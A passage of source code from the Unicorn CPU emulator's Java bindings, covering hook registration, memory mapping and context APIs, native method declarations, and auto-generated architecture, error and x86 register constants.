* * @param callback Implementation of a {@link MemHook} interface * @param type Bitwise OR of {@code UC_HOOK_MEM_*} constants for * valid memory events * @param begin Start address of memory range * @param end End address of memory range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(MemHook callback, int type, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, type, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_MEM_*_UNMAPPED} and/or * {@code UC_HOOK_MEM_*_PROT} hook. * The hook function will be invoked whenever a memory operation is * attempted from an invalid or protected memory address within the address * range begin <= addr <= end. For the special case in which begin > end, * the callback will be invoked for ALL invalid memory operations. * * @param callback Implementation of a {@link EventMemHook} interface * @param type Bitwise OR of {@code UC_HOOK_MEM_*} constants for * invalid memory events. * @param begin Start address of memory range * @param end End address of memory range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(EventMemHook callback, int type, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, type, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_MEM_*_UNMAPPED} and/or * {@code UC_HOOK_MEM_*_PROT} hook for all memory addresses. * * @param callback Implementation of a {@link EventMemHook} interface * @param type Bitwise OR of {@code UC_HOOK_MEM_*} constants for * invalid memory events. * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(EventMemHook callback, int type, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, type, callback, user_data, 1, 0)); } /** * Register a {@code UC_HOOK_INSN_INVALID} hook. The hook function will be * invoked whenever an invalid instruction is encountered. * * @param callback Implementation of a {@link InvalidInstructionHook} * interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InvalidInstructionHook callback, Object user_data) { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_INSN_INVALID, callback, user_data, 1, 0)); } /** * Register a {@code UC_HOOK_EDGE_GENERATED} hook. The hook function will * be invoked whenever a jump is made to a new (untranslated) basic block * with a start address in the range of begin <= pc <= end. For the * special case in which begin > end, the callback will be invoked for ALL * new edges. 
* * @param callback Implementation of a {@link EdgeGeneratedHook} interface * @param begin Start address * @param end End address * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(EdgeGeneratedHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_EDGE_GENERATED, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_TCG_OPCODE} hook. The hook function will be * invoked whenever a matching instruction is executed within the * registered range. * * @param callback Implementation of a {@link TcgOpcodeHook} interface * @param begin Start address * @param end End address * @param opcode Opcode to hook. One of the {@code UC_TCG_OP_*} * constants. * @param flags Flags to filter opcode matches. A bitwise-OR of * {@code UC_TCG_OP_FLAG_*} constants. * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(TcgOpcodeHook callback, long begin, long end, int opcode, int flags, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_TCG_OPCODE, callback, user_data, begin, end, opcode, flags)); } /** * Register a {@code UC_HOOK_TLB_FILL} hook. The hook function will be * invoked to map a virtual address within the registered range to a * physical address. These hooks will only be called if the TLB mode (set * via {@link #ctl_tlb_mode}) is set to {@code UC_TLB_VIRTUAL}. * * @param callback Implementation of a {@link TlbFillHook} interface * @param begin Start address * @param end End address * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(TlbFillHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_TLB_FILL, callback, user_data, begin, end)); } /** Remove a hook that was previously registered. * * @param hook The return value from any {@code hook_add} function. */ public void hook_del(long hook) throws UnicornException { if (hooks.containsKey(hook)) { HookWrapper wrapper = hooks.remove(hook); _hook_del(nativePtr, wrapper.nativePtr); } else { throw new UnicornException("Hook is not registered!"); } } /** Remove all registrations for a given {@link Hook} object. * * @param hook A {@link Hook} object to unregister. */ public void hook_del(Hook hook) throws UnicornException { if (hook == null) { // we use null for "special" hooks that can't be _hook_del'd throw new NullPointerException("hook must not be null"); } Iterator<Map.Entry<Long, HookWrapper>> it = hooks.entrySet().iterator(); while (it.hasNext()) { HookWrapper wrapper = it.next().getValue(); if (wrapper.hook == hook) { it.remove(); _hook_del(nativePtr, wrapper.nativePtr); } } } /** * Create a memory-mapped I/O range. 
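* <p>Illustrative sketch (not part of the original javadoc; the
* {@link MmioReadHandler} callback parameter list shown here is an
* assumption, not documented above). Maps one page whose reads all yield
* a constant; the region is non-writable because no write handler is given:
* <pre>{@code
* uc.mmio_map(0xf0000000L, 0x1000,
*     (u, offset, size, user) -> 0x42L, null, null, null);
* }</pre>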
* * @param address Starting memory address of the MMIO area * @param size Size of the MMIO area * @param read_cb Implementation of {@link MmioReadHandler} to handle * read operations, or {@code null} for non-readable * memory * @param user_data_read User data to be passed to the read callback * @param write_cb Implementation of {@link MmioWriteHandler} to handle * write operations, or {@code null} for non-writable * memory * @param user_data_write User data to be passed to the write callback * @throws UnicornException */ public void mmio_map(long address, long size, MmioReadHandler read_cb, Object user_data_read, MmioWriteHandler write_cb, Object user_data_write) throws UnicornException { /* TODO: Watch mem_unmap to know when it's safe to release the hook. */ long[] hooks = _mmio_map(nativePtr, address, size, read_cb, user_data_read, write_cb, user_data_write); for (long hook : hooks) { registerHook(null, hook); } } /** * Map a range of memory, automatically allocating backing host memory. * * @param address Base address of the memory range * @param size Size of the memory block * @param perms Permissions on the memory block. A bitwise combination * of {@code UC_PROT_*} constants. */ public void mem_map(long address, long size, int perms) throws UnicornException { _mem_map(nativePtr, address, size, perms); } /** * Map a range of memory, backed by an existing region of host memory. * This API enables direct access to emulator memory without going through * {@link #mem_read} and {@link #mem_write}. *
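* <p>Illustrative sketch (not part of the original javadoc), assuming a
* 4 KiB page size and an existing Unicorn instance {@code uc}:
* <pre>{@code
* ByteBuffer backing = ByteBuffer.allocateDirect(0x1000); // exactly one page
* uc.mem_map_ptr(0x100000L, backing, Unicorn.UC_PROT_ALL);
* backing.put(0, (byte) 0x90); // host-side writes are visible to the emulator
* // keep a strong reference to 'backing' for as long as the mapping exists
* }</pre>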

* Usage note: The mapped memory region will correspond to the entire * passed-in Buffer from position 0 (the origin) up to its capacity. The * capacity MUST be a multiple of the page size. The current position and * limit will be ignored. * You can use {@link Buffer#slice()} to get a new Buffer sharing the same * memory region, with the origin set to the current {@code position} and * the capacity set to {@code limit - position}. * * @param address Base address of the memory range * @param buf Direct Buffer referencing the memory to map into the * emulator. IMPORTANT: You are responsible for ensuring * that this Buffer remains alive as long as the memory * remains mapped! * @param perms Permissions on the memory block. A bitwise combination * of {@code UC_PROT_*} constants. */ public void mem_map_ptr(long address, Buffer buf, int perms) throws UnicornException { _mem_map_ptr(nativePtr, address, buf, perms); } /** * Unmap a range of memory. * * @param address Base address of the memory range * @param size Size of the memory block. */ public void mem_unmap(long address, long size) throws UnicornException { _mem_unmap(nativePtr, address, size); } /** * Change permissions on a range of memory. * * @param address Base address of the memory range * @param size Size of the memory block. * @param perms Permissions on the memory block. A bitwise combination * of {@code UC_PROT_*} constants. */ public void mem_protect(long address, long size, int perms) throws UnicornException { _mem_protect(nativePtr, address, size, perms); } /** * Retrieve all memory regions mapped by {@link #mem_map}, * {@link #mmio_map} and {@link #mem_map_ptr}. * NOTE: memory regions may be split by {@link #mem_unmap}. * * @return array of mapped regions. */ public MemRegion[] mem_regions() throws UnicornException { return _mem_regions(nativePtr); } /** * Save the current CPU state of the emulator. The resulting context can be * restored on any emulator with the same {@code arch} and {@code mode}. */ public Context context_save() throws UnicornException { long ptr = _context_alloc(nativePtr); Context context = new Context(); context.nativePtr = ptr; context.arch = arch; context.mode = mode; _context_save(nativePtr, ptr); return context; } /** * Update a {@link Context} object with the current CPU state of the * emulator. */ public void context_update(Context context) throws UnicornException { if (context.arch != arch || context.mode != mode) { throw new UnicornException( "Context is not compatible with this Unicorn"); } _context_save(nativePtr, context.nativePtr); } /** * Restore the current CPU context from a saved copy. */ public void context_restore(Context context) throws UnicornException { if (context.arch != arch || context.mode != mode) { throw new UnicornException( "Context is not compatible with this Unicorn"); } _context_restore(nativePtr, context.nativePtr); } /* Obsolete context implementation, for backwards compatibility only */ /** Structure to track contexts allocated using context_alloc, for * memory safety. Not used for contexts created using * {@link #context_save()}. */ private static Hashtable<Long, Context> allocedContexts = new Hashtable<>(); /** @deprecated Use {@link #context_save()} instead. */ @Deprecated public long context_alloc() { long ptr = _context_alloc(nativePtr); Context context = new Context(); context.nativePtr = ptr; context.arch = arch; context.mode = mode; long index = nextAllocCounter(); allocedContexts.put(index, context); return index; } /** @deprecated Do not use this method. 
* * @param handle Value previously returned by {@link #context_alloc} */ @Deprecated public void free(long handle) { allocedContexts.remove(handle); } /** @deprecated Use {@link #context_save()} or {@link #context_update} * instead */ @Deprecated public void context_save(long context) { context_update(allocedContexts.get(context)); } /** @deprecated Use {@link #context_restore(Context)} instead */ @Deprecated public void context_restore(long context) { context_restore(allocedContexts.get(context)); } /* Native implementation */ private static native long _open(int arch, int mode) throws UnicornException; private static native void _close(long uc) throws UnicornException; private static native void _emu_start(long uc, long begin, long until, long timeout, long count) throws UnicornException; private static native void _emu_stop(long uc) throws UnicornException; private static native long _reg_read_long(long ptr, int isContext, int regid) throws UnicornException; private static native void _reg_read_bytes(long ptr, int isContext, int regid, byte[] data) throws UnicornException; private static native void _reg_write_long(long ptr, int isContext, int regid, long val) throws UnicornException; private static native void _reg_write_bytes(long ptr, int isContext, int regid, byte[] data) throws UnicornException; private static native X86_MMR _reg_read_x86_mmr(long ptr, int isContext, int regid) throws UnicornException; private static native void _reg_write_x86_mmr(long ptr, int isContext, int regid, short selector, long base, int limit, int flags) throws UnicornException; private static native long _reg_read_x86_msr(long ptr, int isContext, int rid) throws UnicornException; private static native void _reg_write_x86_msr(long ptr, int isContext, int rid, long value) throws UnicornException; private static native long _reg_read_arm_cp(long ptr, int isContext, int cp, int is64, int sec, int crn, int crm, int opc1, int opc2) throws UnicornException; private static native void _reg_write_arm_cp(long ptr, int isContext, int cp, int is64, int sec, int crn, int crm, int opc1, int opc2, long value) throws UnicornException; private static native long _reg_read_arm64_cp(long ptr, int isContext, int crn, int crm, int op0, int op1, int op2) throws UnicornException; private static native void _reg_write_arm64_cp(long ptr, int isContext, int crn, int crm, int op0, int op1, int op2, long value) throws UnicornException; private static native void _mem_read(long uc, long address, byte[] dest) throws UnicornException; private static native void _mem_write(long uc, long address, byte[] src) throws UnicornException; private static native int _version(); private static native boolean _arch_supported(int arch); private static native long _query(long uc, int type) throws UnicornException; private static native int _errno(long uc); private static native String _strerror(int code); private native long _hook_add(long uc, int type, Hook callback, Object user_data, long begin, long end) throws UnicornException; private native long _hook_add(long uc, int type, Hook callback, Object user_data, long begin, long end, int arg) throws UnicornException; private native long _hook_add(long uc, int type, Hook callback, Object user_data, long begin, long end, int arg1, int arg2) throws UnicornException; private static native void _hook_del(long uc, long hh) throws UnicornException; private static native void _hookwrapper_free(long hh) throws UnicornException; private native long[] _mmio_map(long uc, long address, long size, 
MmioReadHandler read_cb, Object user_data_read, MmioWriteHandler write_cb, Object user_data_write) throws UnicornException; private static native void _mem_map(long uc, long address, long size, int perms) throws UnicornException; private static native void _mem_map_ptr(long uc, long address, Buffer buf, int perms) throws UnicornException; private static native void _mem_unmap(long uc, long address, long size) throws UnicornException; private static native void _mem_protect(long uc, long address, long size, int perms) throws UnicornException; private static native MemRegion[] _mem_regions(long uc) throws UnicornException; private static native long _context_alloc(long uc) throws UnicornException; private static native void _context_free(long ctx) throws UnicornException; private static native void _context_save(long uc, long ctx) throws UnicornException; private static native void _context_restore(long uc, long ctx) throws UnicornException; private static native int _ctl_get_mode(long uc) throws UnicornException; private static native int _ctl_get_arch(long uc) throws UnicornException; private static native long _ctl_get_timeout(long uc) throws UnicornException; private static native int _ctl_get_page_size(long uc) throws UnicornException; private static native void _ctl_set_page_size(long uc, int page_size) throws UnicornException; private static native void _ctl_set_use_exits(long uc, boolean value) throws UnicornException; private static native long _ctl_get_exits_cnt(long uc) throws UnicornException; private static native long[] _ctl_get_exits(long uc) throws UnicornException; private static native void _ctl_set_exits(long uc, long[] exits) throws UnicornException; private static native int _ctl_get_cpu_model(long uc) throws UnicornException; private static native void _ctl_set_cpu_model(long uc, int cpu_model) throws UnicornException; private static native TranslationBlock _ctl_request_cache(long uc, long address) throws UnicornException; private static native void _ctl_remove_cache(long uc, long address, long end) throws UnicornException; private static native void _ctl_flush_tb(long uc) throws UnicornException; private static native void _ctl_flush_tlb(long uc) throws UnicornException; private static native void _ctl_tlb_mode(long uc, int mode) throws UnicornException; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/UnicornConst.java000066400000000000000000000160471467524106700253320ustar00rootroot00000000000000// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface UnicornConst { public static final int UC_API_MAJOR = 2; public static final int UC_API_MINOR = 1; public static final int UC_API_PATCH = 0; public static final int UC_API_EXTRA = 255; public static final int UC_VERSION_MAJOR = 2; public static final int UC_VERSION_MINOR = 1; public static final int UC_VERSION_PATCH = 0; public static final int UC_VERSION_EXTRA = 255; public static final int UC_SECOND_SCALE = 1000000; public static final int UC_MILISECOND_SCALE = 1000; public static final int UC_ARCH_ARM = 1; public static final int UC_ARCH_ARM64 = 2; public static final int UC_ARCH_MIPS = 3; public static final int UC_ARCH_X86 = 4; public static final int UC_ARCH_PPC = 5; public static final int UC_ARCH_SPARC = 6; public static final int UC_ARCH_M68K = 7; public static final int UC_ARCH_RISCV = 8; public static final int UC_ARCH_S390X = 9; public static final int UC_ARCH_TRICORE = 10; public static final int UC_ARCH_MAX = 11; public static final int UC_MODE_LITTLE_ENDIAN = 0; public static final int UC_MODE_BIG_ENDIAN = 1073741824; public static final int UC_MODE_ARM = 0; public static final int UC_MODE_THUMB = 16; public static final int UC_MODE_MCLASS = 32; public static final int UC_MODE_V8 = 64; public static final int UC_MODE_ARMBE8 = 1024; public static final int UC_MODE_ARM926 = 128; public static final int UC_MODE_ARM946 = 256; public static final int UC_MODE_ARM1176 = 512; public static final int UC_MODE_MICRO = 16; public static final int UC_MODE_MIPS3 = 32; public static final int UC_MODE_MIPS32R6 = 64; public static final int UC_MODE_MIPS32 = 4; public static final int UC_MODE_MIPS64 = 8; public static final int UC_MODE_16 = 2; public static final int UC_MODE_32 = 4; public static final int UC_MODE_64 = 8; public static final int UC_MODE_PPC32 = 4; public static final int UC_MODE_PPC64 = 8; public static final int UC_MODE_QPX = 16; public static final int UC_MODE_SPARC32 = 4; public static final int UC_MODE_SPARC64 = 8; public static final int UC_MODE_V9 = 16; public static final int UC_MODE_RISCV32 = 4; public static final int UC_MODE_RISCV64 = 8; public static final int UC_ERR_OK = 0; public static final int UC_ERR_NOMEM = 1; public static final int UC_ERR_ARCH = 2; public static final int UC_ERR_HANDLE = 3; public static final int UC_ERR_MODE = 4; public static final int UC_ERR_VERSION = 5; public static final int UC_ERR_READ_UNMAPPED = 6; public static final int UC_ERR_WRITE_UNMAPPED = 7; public static final int UC_ERR_FETCH_UNMAPPED = 8; public static final int UC_ERR_HOOK = 9; public static final int UC_ERR_INSN_INVALID = 10; public static final int UC_ERR_MAP = 11; public static final int UC_ERR_WRITE_PROT = 12; public static final int UC_ERR_READ_PROT = 13; public static final int UC_ERR_FETCH_PROT = 14; public static final int UC_ERR_ARG = 15; public static final int UC_ERR_READ_UNALIGNED = 16; public static final int UC_ERR_WRITE_UNALIGNED = 17; public static final int UC_ERR_FETCH_UNALIGNED = 18; public static final int UC_ERR_HOOK_EXIST = 19; public static final int UC_ERR_RESOURCE = 20; public static final int UC_ERR_EXCEPTION = 21; public static final int UC_ERR_OVERFLOW = 22; public static final int UC_MEM_READ = 16; public static final int UC_MEM_WRITE = 17; public static final int UC_MEM_FETCH = 18; public static final int UC_MEM_READ_UNMAPPED = 19; public static final int UC_MEM_WRITE_UNMAPPED = 20; public static final int UC_MEM_FETCH_UNMAPPED = 21; public static final int UC_MEM_WRITE_PROT = 
22; public static final int UC_MEM_READ_PROT = 23; public static final int UC_MEM_FETCH_PROT = 24; public static final int UC_MEM_READ_AFTER = 25; public static final int UC_TCG_OP_SUB = 0; public static final int UC_TCG_OP_FLAG_CMP = 1; public static final int UC_TCG_OP_FLAG_DIRECT = 2; public static final int UC_HOOK_INTR = 1; public static final int UC_HOOK_INSN = 2; public static final int UC_HOOK_CODE = 4; public static final int UC_HOOK_BLOCK = 8; public static final int UC_HOOK_MEM_READ_UNMAPPED = 16; public static final int UC_HOOK_MEM_WRITE_UNMAPPED = 32; public static final int UC_HOOK_MEM_FETCH_UNMAPPED = 64; public static final int UC_HOOK_MEM_READ_PROT = 128; public static final int UC_HOOK_MEM_WRITE_PROT = 256; public static final int UC_HOOK_MEM_FETCH_PROT = 512; public static final int UC_HOOK_MEM_READ = 1024; public static final int UC_HOOK_MEM_WRITE = 2048; public static final int UC_HOOK_MEM_FETCH = 4096; public static final int UC_HOOK_MEM_READ_AFTER = 8192; public static final int UC_HOOK_INSN_INVALID = 16384; public static final int UC_HOOK_EDGE_GENERATED = 32768; public static final int UC_HOOK_TCG_OPCODE = 65536; public static final int UC_HOOK_TLB_FILL = 131072; public static final int UC_HOOK_MEM_UNMAPPED = 112; public static final int UC_HOOK_MEM_PROT = 896; public static final int UC_HOOK_MEM_READ_INVALID = 144; public static final int UC_HOOK_MEM_WRITE_INVALID = 288; public static final int UC_HOOK_MEM_FETCH_INVALID = 576; public static final int UC_HOOK_MEM_INVALID = 1008; public static final int UC_HOOK_MEM_VALID = 7168; public static final int UC_QUERY_MODE = 1; public static final int UC_QUERY_PAGE_SIZE = 2; public static final int UC_QUERY_ARCH = 3; public static final int UC_QUERY_TIMEOUT = 4; public static final int UC_CTL_IO_NONE = 0; public static final int UC_CTL_IO_WRITE = 1; public static final int UC_CTL_IO_READ = 2; public static final int UC_CTL_IO_READ_WRITE = 3; public static final int UC_TLB_CPU = 0; public static final int UC_TLB_VIRTUAL = 1; public static final int UC_CTL_UC_MODE = 0; public static final int UC_CTL_UC_PAGE_SIZE = 1; public static final int UC_CTL_UC_ARCH = 2; public static final int UC_CTL_UC_TIMEOUT = 3; public static final int UC_CTL_UC_USE_EXITS = 4; public static final int UC_CTL_UC_EXITS_CNT = 5; public static final int UC_CTL_UC_EXITS = 6; public static final int UC_CTL_CPU_MODEL = 7; public static final int UC_CTL_TB_REQUEST_CACHE = 8; public static final int UC_CTL_TB_REMOVE_CACHE = 9; public static final int UC_CTL_TB_FLUSH = 10; public static final int UC_CTL_TLB_FLUSH = 11; public static final int UC_CTL_TLB_TYPE = 12; public static final int UC_CTL_TCG_BUFFER_SIZE = 13; public static final int UC_CTL_CONTEXT_MODE = 14; public static final int UC_PROT_NONE = 0; public static final int UC_PROT_READ = 1; public static final int UC_PROT_WRITE = 2; public static final int UC_PROT_EXEC = 4; public static final int UC_PROT_ALL = 7; public static final int UC_CTL_CONTEXT_CPU = 1; public static final int UC_CTL_CONTEXT_MEMORY = 2; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/UnicornException.java000066400000000000000000000016141467524106700261740ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; public class UnicornException extends RuntimeException { public UnicornException() { super(); } public UnicornException(String msg) { super(msg); } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86Const.java000066400000000000000000002516461467524106700243100ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface X86Const { // X86 CPU public static final int UC_CPU_X86_QEMU64 = 0; public static final int UC_CPU_X86_PHENOM = 1; public static final int UC_CPU_X86_CORE2DUO = 2; public static final int UC_CPU_X86_KVM64 = 3; public static final int UC_CPU_X86_QEMU32 = 4; public static final int UC_CPU_X86_KVM32 = 5; public static final int UC_CPU_X86_COREDUO = 6; public static final int UC_CPU_X86_486 = 7; public static final int UC_CPU_X86_PENTIUM = 8; public static final int UC_CPU_X86_PENTIUM2 = 9; public static final int UC_CPU_X86_PENTIUM3 = 10; public static final int UC_CPU_X86_ATHLON = 11; public static final int UC_CPU_X86_N270 = 12; public static final int UC_CPU_X86_CONROE = 13; public static final int UC_CPU_X86_PENRYN = 14; public static final int UC_CPU_X86_NEHALEM = 15; public static final int UC_CPU_X86_WESTMERE = 16; public static final int UC_CPU_X86_SANDYBRIDGE = 17; public static final int UC_CPU_X86_IVYBRIDGE = 18; public static final int UC_CPU_X86_HASWELL = 19; public static final int UC_CPU_X86_BROADWELL = 20; public static final int UC_CPU_X86_SKYLAKE_CLIENT = 21; public static final int UC_CPU_X86_SKYLAKE_SERVER = 22; public static final int UC_CPU_X86_CASCADELAKE_SERVER = 23; public static final int UC_CPU_X86_COOPERLAKE = 24; public static final int UC_CPU_X86_ICELAKE_CLIENT = 25; public static final int UC_CPU_X86_ICELAKE_SERVER = 26; public static final int UC_CPU_X86_DENVERTON = 27; public static final int UC_CPU_X86_SNOWRIDGE = 28; public static final int UC_CPU_X86_KNIGHTSMILL = 29; public static final int UC_CPU_X86_OPTERON_G1 = 30; public static final int UC_CPU_X86_OPTERON_G2 = 31; public static final int UC_CPU_X86_OPTERON_G3 = 32; public static final int UC_CPU_X86_OPTERON_G4 = 33; public static final int UC_CPU_X86_OPTERON_G5 = 34; public static final int UC_CPU_X86_EPYC = 35; public static final int UC_CPU_X86_DHYANA = 36; public static final int UC_CPU_X86_EPYC_ROME = 37; public static final int UC_CPU_X86_ENDING = 38; // X86 registers public static final int UC_X86_REG_INVALID = 0; public static final int UC_X86_REG_AH = 1; public static final int UC_X86_REG_AL = 2; public static final int UC_X86_REG_AX = 3; public static final int UC_X86_REG_BH = 4; public static final int UC_X86_REG_BL = 5; public static final int UC_X86_REG_BP = 6; public static final int UC_X86_REG_BPL = 7; public static final int UC_X86_REG_BX = 8; public static final int UC_X86_REG_CH = 9; public static final int UC_X86_REG_CL = 10; public static final int UC_X86_REG_CS = 11; public static final int UC_X86_REG_CX = 12; public static final int UC_X86_REG_DH = 13; public static final int UC_X86_REG_DI = 14; public static final int UC_X86_REG_DIL = 15; public static 
final int UC_X86_REG_DL = 16; public static final int UC_X86_REG_DS = 17; public static final int UC_X86_REG_DX = 18; public static final int UC_X86_REG_EAX = 19; public static final int UC_X86_REG_EBP = 20; public static final int UC_X86_REG_EBX = 21; public static final int UC_X86_REG_ECX = 22; public static final int UC_X86_REG_EDI = 23; public static final int UC_X86_REG_EDX = 24; public static final int UC_X86_REG_EFLAGS = 25; public static final int UC_X86_REG_EIP = 26; public static final int UC_X86_REG_ES = 28; public static final int UC_X86_REG_ESI = 29; public static final int UC_X86_REG_ESP = 30; public static final int UC_X86_REG_FPSW = 31; public static final int UC_X86_REG_FS = 32; public static final int UC_X86_REG_GS = 33; public static final int UC_X86_REG_IP = 34; public static final int UC_X86_REG_RAX = 35; public static final int UC_X86_REG_RBP = 36; public static final int UC_X86_REG_RBX = 37; public static final int UC_X86_REG_RCX = 38; public static final int UC_X86_REG_RDI = 39; public static final int UC_X86_REG_RDX = 40; public static final int UC_X86_REG_RIP = 41; public static final int UC_X86_REG_RSI = 43; public static final int UC_X86_REG_RSP = 44; public static final int UC_X86_REG_SI = 45; public static final int UC_X86_REG_SIL = 46; public static final int UC_X86_REG_SP = 47; public static final int UC_X86_REG_SPL = 48; public static final int UC_X86_REG_SS = 49; public static final int UC_X86_REG_CR0 = 50; public static final int UC_X86_REG_CR1 = 51; public static final int UC_X86_REG_CR2 = 52; public static final int UC_X86_REG_CR3 = 53; public static final int UC_X86_REG_CR4 = 54; public static final int UC_X86_REG_CR8 = 58; public static final int UC_X86_REG_DR0 = 66; public static final int UC_X86_REG_DR1 = 67; public static final int UC_X86_REG_DR2 = 68; public static final int UC_X86_REG_DR3 = 69; public static final int UC_X86_REG_DR4 = 70; public static final int UC_X86_REG_DR5 = 71; public static final int UC_X86_REG_DR6 = 72; public static final int UC_X86_REG_DR7 = 73; public static final int UC_X86_REG_FP0 = 82; public static final int UC_X86_REG_FP1 = 83; public static final int UC_X86_REG_FP2 = 84; public static final int UC_X86_REG_FP3 = 85; public static final int UC_X86_REG_FP4 = 86; public static final int UC_X86_REG_FP5 = 87; public static final int UC_X86_REG_FP6 = 88; public static final int UC_X86_REG_FP7 = 89; public static final int UC_X86_REG_K0 = 90; public static final int UC_X86_REG_K1 = 91; public static final int UC_X86_REG_K2 = 92; public static final int UC_X86_REG_K3 = 93; public static final int UC_X86_REG_K4 = 94; public static final int UC_X86_REG_K5 = 95; public static final int UC_X86_REG_K6 = 96; public static final int UC_X86_REG_K7 = 97; public static final int UC_X86_REG_MM0 = 98; public static final int UC_X86_REG_MM1 = 99; public static final int UC_X86_REG_MM2 = 100; public static final int UC_X86_REG_MM3 = 101; public static final int UC_X86_REG_MM4 = 102; public static final int UC_X86_REG_MM5 = 103; public static final int UC_X86_REG_MM6 = 104; public static final int UC_X86_REG_MM7 = 105; public static final int UC_X86_REG_R8 = 106; public static final int UC_X86_REG_R9 = 107; public static final int UC_X86_REG_R10 = 108; public static final int UC_X86_REG_R11 = 109; public static final int UC_X86_REG_R12 = 110; public static final int UC_X86_REG_R13 = 111; public static final int UC_X86_REG_R14 = 112; public static final int UC_X86_REG_R15 = 113; public static final int UC_X86_REG_ST0 = 114; public static 
final int UC_X86_REG_ST1 = 115; public static final int UC_X86_REG_ST2 = 116; public static final int UC_X86_REG_ST3 = 117; public static final int UC_X86_REG_ST4 = 118; public static final int UC_X86_REG_ST5 = 119; public static final int UC_X86_REG_ST6 = 120; public static final int UC_X86_REG_ST7 = 121; public static final int UC_X86_REG_XMM0 = 122; public static final int UC_X86_REG_XMM1 = 123; public static final int UC_X86_REG_XMM2 = 124; public static final int UC_X86_REG_XMM3 = 125; public static final int UC_X86_REG_XMM4 = 126; public static final int UC_X86_REG_XMM5 = 127; public static final int UC_X86_REG_XMM6 = 128; public static final int UC_X86_REG_XMM7 = 129; public static final int UC_X86_REG_XMM8 = 130; public static final int UC_X86_REG_XMM9 = 131; public static final int UC_X86_REG_XMM10 = 132; public static final int UC_X86_REG_XMM11 = 133; public static final int UC_X86_REG_XMM12 = 134; public static final int UC_X86_REG_XMM13 = 135; public static final int UC_X86_REG_XMM14 = 136; public static final int UC_X86_REG_XMM15 = 137; public static final int UC_X86_REG_XMM16 = 138; public static final int UC_X86_REG_XMM17 = 139; public static final int UC_X86_REG_XMM18 = 140; public static final int UC_X86_REG_XMM19 = 141; public static final int UC_X86_REG_XMM20 = 142; public static final int UC_X86_REG_XMM21 = 143; public static final int UC_X86_REG_XMM22 = 144; public static final int UC_X86_REG_XMM23 = 145; public static final int UC_X86_REG_XMM24 = 146; public static final int UC_X86_REG_XMM25 = 147; public static final int UC_X86_REG_XMM26 = 148; public static final int UC_X86_REG_XMM27 = 149; public static final int UC_X86_REG_XMM28 = 150; public static final int UC_X86_REG_XMM29 = 151; public static final int UC_X86_REG_XMM30 = 152; public static final int UC_X86_REG_XMM31 = 153; public static final int UC_X86_REG_YMM0 = 154; public static final int UC_X86_REG_YMM1 = 155; public static final int UC_X86_REG_YMM2 = 156; public static final int UC_X86_REG_YMM3 = 157; public static final int UC_X86_REG_YMM4 = 158; public static final int UC_X86_REG_YMM5 = 159; public static final int UC_X86_REG_YMM6 = 160; public static final int UC_X86_REG_YMM7 = 161; public static final int UC_X86_REG_YMM8 = 162; public static final int UC_X86_REG_YMM9 = 163; public static final int UC_X86_REG_YMM10 = 164; public static final int UC_X86_REG_YMM11 = 165; public static final int UC_X86_REG_YMM12 = 166; public static final int UC_X86_REG_YMM13 = 167; public static final int UC_X86_REG_YMM14 = 168; public static final int UC_X86_REG_YMM15 = 169; public static final int UC_X86_REG_YMM16 = 170; public static final int UC_X86_REG_YMM17 = 171; public static final int UC_X86_REG_YMM18 = 172; public static final int UC_X86_REG_YMM19 = 173; public static final int UC_X86_REG_YMM20 = 174; public static final int UC_X86_REG_YMM21 = 175; public static final int UC_X86_REG_YMM22 = 176; public static final int UC_X86_REG_YMM23 = 177; public static final int UC_X86_REG_YMM24 = 178; public static final int UC_X86_REG_YMM25 = 179; public static final int UC_X86_REG_YMM26 = 180; public static final int UC_X86_REG_YMM27 = 181; public static final int UC_X86_REG_YMM28 = 182; public static final int UC_X86_REG_YMM29 = 183; public static final int UC_X86_REG_YMM30 = 184; public static final int UC_X86_REG_YMM31 = 185; public static final int UC_X86_REG_ZMM0 = 186; public static final int UC_X86_REG_ZMM1 = 187; public static final int UC_X86_REG_ZMM2 = 188; public static final int UC_X86_REG_ZMM3 = 189; public 
